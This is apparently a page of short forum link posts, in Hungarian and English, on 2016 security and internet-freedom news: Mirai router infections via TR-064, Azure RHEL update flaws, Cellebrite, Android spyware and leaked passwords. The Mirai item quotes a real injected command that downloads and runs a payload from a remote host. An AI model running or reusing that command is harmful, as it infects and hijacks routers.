HUP cikkturkáló

New Mirai attack vector – bot exploits a recently discovered router vulnerability

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2
[...]
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also know as LAN-Side DSL CPE Configuration
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to for example change DNS or NTP settings.
https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-di…

Magyarországon 176157 IP esetében érhető el az Internet felől az érintett 7547-es port.

via https://www.shodan.io/search?query=port%3A7547+country%3Ahu

Internet freedom declined in 2016 for the sixth consecutive year.

https://freedomhouse.org/report/freedom-net/freedom-net-2016

  • Two-thirds of all internet users – 67 percent – live in countries where criticism of the government, military, or ruling family are subject to censorship.
  • Social media users face unprecedented penalties, as authorities in 38 countries made arrests based on social media posts over the past year. Globally, 27 percent of all internet users live in countries where people have been arrested for publishing, sharing, or merely “liking” content on Facebook.
  • Governments are increasingly going after messaging apps like WhatsApp and Telegram, which can spread information quickly and securely.

In January 2016, the European Court of Human Rights found that Hungary’s internet and telecommunication surveillance practices violate the European Convention on Human Rights (see Surveillance, Privacy, and Anonymity).

Microsoft update servers left all Azure RHEL instances hackable

"Microsoft has patched flaws that attackers could exploit to compromise all Azure Red Hat Enterprise Linux (RHEL) instances.

Software engineer Ian Duffy found the flaws while building a secure RHEL image for Microsoft Azure. During that process he noticed an installation script Azure uses in its preconfigured RPM Package Manager contains build host information that allows attackers to find all four Red Hat Update Appliances which expose REST APIs over HTTPS.

From there Duffy found a package labelled PrepareRHUI (Red Hat Update Infrastructure) that runs on all Azure RHEL boxes, and contains the rhui-monitor.cloud build host."

Microsoft update servers left all Azure RHEL instances hackable

Cellebrite: Ipari telefon feltörés

http://phys.org/news/2016-11-israeli-firm-seconds.html

The company has contracts in more than 115 countries, many with governments, and it shot to global prominence in March when it was reported the FBI used its technology to crack the iPhone of one of the jihadist-inspired killers in San Bernardino, California.

The phone in the demonstration, an LG G4 run on Google's Android operating system, is a model Cellebrite had already cracked, so the extraction did not take long.

In the firm's lab they have 15,000 phones—with around 150-200 new models added each month.

When a new phone is launched, Ben-Peretz said, their 250-person research team races against competitors to find a chink in its armour, a process that can range from a few days to months.

Among the data the firm claims to be able to access are text messages deleted years previously.

Valóban ennyire működhet még az undelete?

8-dik osztályos felvételi feladatok és javítókulcsok letöltése

Közeledik a felvételi a középiskolákba, a régebbi felvételik elérhetők az oktatási minisztérium honlapján. Sajnos a gyakorláshoz-nézegetéshez kézzel elég unalmas letöltögetni a feladatokat és a javítókulcsokat, úgyhogy felraktam egy Bash scriptet, ami ezt megteszi helyettünk. Ha már mind letöltődött, már csak egyetlen sort kell a parancssorba gépelni, és már mind ki is van nyomtatva.

Elérhető a GitHub-on.

Spyware on Chinese Android phones

Kryptowire has identified several models of Android mobile devices that contained firmware that collected sensitive personal data about their users and transmitted this sensitive data to third-party servers without disclosure or the users' consent.

http://www.kryptowire.com/adups_security_analysis.html
http://www.androidpolice.com/2016/11/15/security-firm-reportedly-finds-…

Facebook Buying “Back” Stolen Passwords From Dark Web

Tehát elvileg a facebook szólni fog, ha olyan jelszót használsz, ami kiszivárgott.

http://www.informationsecuritybuzz.com/hacker-news/facebook-buying-back…

Aki esetleg nem ismerné, hasonló szolgáltatás: https://haveibeenpwned.com/

Itt fel tudsz iratkozni, ha valamelyik (ismert és könnyen hozzáférhető) feltört adatbázisban szerepel az email-ed vagy felhasználóneved. (én 8ban voltam érintett szerinte, fakkyeah!)